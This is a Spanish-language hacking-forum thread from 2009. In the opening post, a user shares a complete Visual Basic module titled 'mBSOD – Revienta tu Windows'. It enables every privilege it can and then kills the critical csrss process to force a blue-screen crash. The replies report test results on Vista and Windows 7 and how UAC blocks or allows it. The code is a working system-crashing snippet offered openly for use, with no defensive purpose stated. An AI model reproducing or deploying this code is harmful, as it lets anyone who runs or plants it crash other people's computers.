elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [SNIPPET] mBSOD - Revienta tu Windows
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [SNIPPET] mBSOD - Revienta tu Windows  (Leído 4,286 veces)
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
[SNIPPET] mBSOD - Revienta tu Windows
« en: 17 Julio 2009, 13:42 pm »

Código
  1. '---------------------------------------------------------------------------------------
  2. ' Module    : mBSOD
  3. ' Author    : Karcrack
  4. ' Now$      : 16/07/2009  18:08
  5. ' Used for? : Make a BSOD on W$
  6. ' Tested On : W. XP ... W. Vista (Thanks Kiash)... W. Seven (Thanks SkyWeb/Dessa)
  7. '---------------------------------------------------------------------------------------
  8.  
  9. Option Explicit
  10.  
  11. 'NTDLL
  12. Private Declare Function CsrGetProcessId Lib "ntdll.dll" () As Long
  13. Private Declare Function RtlAdjustPrivilege Lib "ntdll.dll" (ByVal Privilege As Long, ByVal Enable As Long, ByVal Client As Long, WasEnabled As Long) As Long
  14. 'KERNEL32
  15. Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
  16. Private Declare Function TerminateProcess Lib "kernel32.dll" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
  17.  
  18. Public Sub CrashWindows()
  19.    Dim hProc       As Long
  20.  
  21.    Call GetAllPrivilegies
  22.  
  23.    hProc = OpenProcess(&H1F0FFF, 0&, CsrGetProcessId) ' &H1F0FFF = PROCESS_ALL_ACCESS
  24.    Call TerminateProcess(hProc, 0&)
  25. End Sub
  26.  
  27. Private Sub GetAllPrivilegies()
  28.    Dim i           As Long
  29.  
  30.    For i = 0 To 200: Call RtlAdjustPrivilege(ByVal i&, 1, 0, 0): Next i
  31. End Sub

Si alguien puede que lo pruebe en Windows Vista o Windows 7...

Gracias por probarlo, Kiash, SkyWeb, Dessa


« Última modificación: 17 Julio 2009, 14:45 pm por Karcrack » En línea

Dessa


Desconectado Desconectado

Mensajes: 624



Ver Perfil
Re: [SNIPPET] mBSOD - Revienta tu Windows
« Respuesta #1 en: 17 Julio 2009, 14:34 pm »

En W7 como Adm. con el UAC predeterminado o alto iignora la instruccion, con el UAC desactivado si se clava el windows pero al reiniciar se inicia normalmente

S2 


En línea

Adrian Desanti
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: [SNIPPET] mBSOD - Revienta tu Windows
« Respuesta #2 en: 17 Julio 2009, 14:47 pm »

En W7 como Adm. con el UAC predeterminado o alto iignora la instruccion, con el UAC desactivado si se clava el windows pero al reiniciar se inicia normalmente

S2 
SkyWeb dice que funciona bien en Win. 7... Sera cosa de su UAC...

Bueno, este codigo no se carga el W$, simplemente fuerza su apagado mostrando un feo BSOD
En línea

XcryptOR

Desconectado Desconectado

Mensajes: 228



Ver Perfil
Re: [SNIPPET] mBSOD - Revienta tu Windows
« Respuesta #3 en: 17 Julio 2009, 16:04 pm »

Funciona bien como admin, con la UAC activada.
En línea



Dessa


Desconectado Desconectado

Mensajes: 624



Ver Perfil
Re: [SNIPPET] mBSOD - Revienta tu Windows
« Respuesta #4 en: 17 Julio 2009, 18:50 pm »

Lo probé nuevamente, activé el UAC (a nivel predeterminado), luego reinicié windows y ejecuté el code sin ninguna respuesta (tampoco ningun error). Luego volví a desactivar el UAC y reiniciar windows, en este caso sí funcionó (con el UAC dasactivado)
Probé con Windows Seven RC 7100 con todas las actualizaciones al dia

S2   
En línea

Adrian Desanti
carlitrosss6

Desconectado Desconectado

Mensajes: 18


You know you're right.


Ver Perfil
Re: [SNIPPET] mBSOD - Revienta tu Windows
« Respuesta #5 en: 20 Julio 2009, 05:01 am »

Jeje.. vi un code parecido de xcryptor,pero este ademàs de darle privilegio de Semi-Dios al proceso,tambien intenta terminarlo y produce una bonita pantalla azul,muy bueno :)
En línea

Arriba Mèxico!!
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines